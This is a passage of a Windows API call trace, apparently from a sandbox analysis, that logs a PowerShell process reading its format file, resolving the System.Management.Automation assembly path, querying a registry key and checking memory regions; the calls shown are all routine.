	[0088.921] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.921] GetLastError () returned 0x0
	[0088.921] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.921] GetLastError () returned 0x0
	[0088.921] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.922] GetLastError () returned 0x0
	[0088.922] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.922] GetLastError () returned 0x0
	[0088.922] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.922] GetLastError () returned 0x0
	[0088.922] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0xf37, lpOverlapped=0x0) returned 1
	[0088.922] GetLastError () returned 0x0
	[0088.922] ReadFile (in: hFile=0x29c, lpBuffer=0x18d02d7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d02d7*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.922] GetLastError () returned 0x0
	[0088.922] ReadFile (in: hFile=0x29c, lpBuffer=0x18d0c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x18d0c00*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.922] GetLastError () returned 0x0
	[0088.922] CloseHandle (hObject=0x29c) returned 1
	[0088.923] GetLastError () returned 0x0
	[0088.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0088.923] GetLastError () returned 0x0
	[0088.923] SetErrorMode (uMode=0x1) returned 0x1
	[0088.923] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18f1bfc | out: lpFileInformation=0x18f1bfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0088.923] GetLastError () returned 0x0
	[0088.923] SetErrorMode (uMode=0x1) returned 0x1
	[0088.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0088.923] GetLastError () returned 0x0
	[0088.923] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e718 | out: phkResult=0x14e718*=0x29c) returned 0x0
	[0088.923] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x0, lpcbData=0x14e75c*=0x0 | out: lpType=0x14e760*=0x1, lpData=0x0, lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.923] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x361778, lpcbData=0x14e75c*=0x56 | out: lpType=0x14e760*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.924] RegCloseKey (hKey=0x29c) returned 0x0
	[0088.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0088.924] GetLastError () returned 0x0
	[0088.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0088.924] GetLastError () returned 0x0
	[0088.933] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x2ea2ca8e, Data2=0x17fd, Data3=0x4b0b, Data4=([0]=0x93, [1]=0xc6, [2]=0x84, [3]=0xdb, [4]=0x91, [5]=0x2f, [6]=0x3, [7]=0x18))) returned 0x0
	[0088.934] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x8db4e987, Data2=0xb67e, Data3=0x465f, Data4=([0]=0x8c, [1]=0x4d, [2]=0x16, [3]=0x41, [4]=0xc9, [5]=0xd7, [6]=0xae, [7]=0xd9))) returned 0x0
	[0088.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.934] GetLastError () returned 0x0
	[0088.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.934] GetLastError () returned 0x0
	[0088.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.934] GetLastError () returned 0x0
	[0088.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.934] GetLastError () returned 0x0
	[0088.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.952] GetLastError () returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.953] GetLastError () returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.953] GetLastError () returned 0x0
	[0088.953] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x34742bd8, Data2=0xa100, Data3=0x4e23, Data4=([0]=0x8c, [1]=0x1, [2]=0x4b, [3]=0xfe, [4]=0xe8, [5]=0xa3, [6]=0x58, [7]=0xd5))) returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.953] GetLastError () returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.953] GetLastError () returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.953] GetLastError () returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.953] GetLastError () returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.953] GetLastError () returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.953] GetLastError () returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.953] GetLastError () returned 0x0
	[0088.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.954] GetLastError () returned 0x0
	[0088.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.955] GetLastError () returned 0x0
	[0088.955] VirtualQuery (in: lpAddress=0x14d0d4, lpBuffer=0x14e0d4, dwLength=0x1c | out: lpBuffer=0x14e0d4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.955] VirtualQuery (in: lpAddress=0x14d110, lpBuffer=0x14e110, dwLength=0x1c | out: lpBuffer=0x14e110*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.956] GetLastError () returned 0x0
	[0088.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.956] GetLastError () returned 0x0
	[0088.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.956] GetLastError () returned 0x0
	[0088.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.956] GetLastError () returned 0x0
	[0088.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.956] GetLastError () returned 0x0
	[0088.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.956] GetLastError () returned 0x0
	[0088.957] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.957] GetLastError () returned 0x0
	[0088.957] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.957] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.958] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.958] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.959] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.959] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.959] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.959] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.959] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.959] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.960] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.960] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.960] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.961] VirtualQuery (in: lpAddress=0x14d27c, lpBuffer=0x14e27c, dwLength=0x1c | out: lpBuffer=0x14e27c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.961] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.961] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.961] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.962] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.962] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xb6ee0369, Data2=0x334e, Data3=0x4535, Data4=([0]=0xad, [1]=0xbc, [2]=0xdc, [3]=0x10, [4]=0x20, [5]=0x50, [6]=0x6d, [7]=0xfe))) returned 0x0
	[0088.963] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.963] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
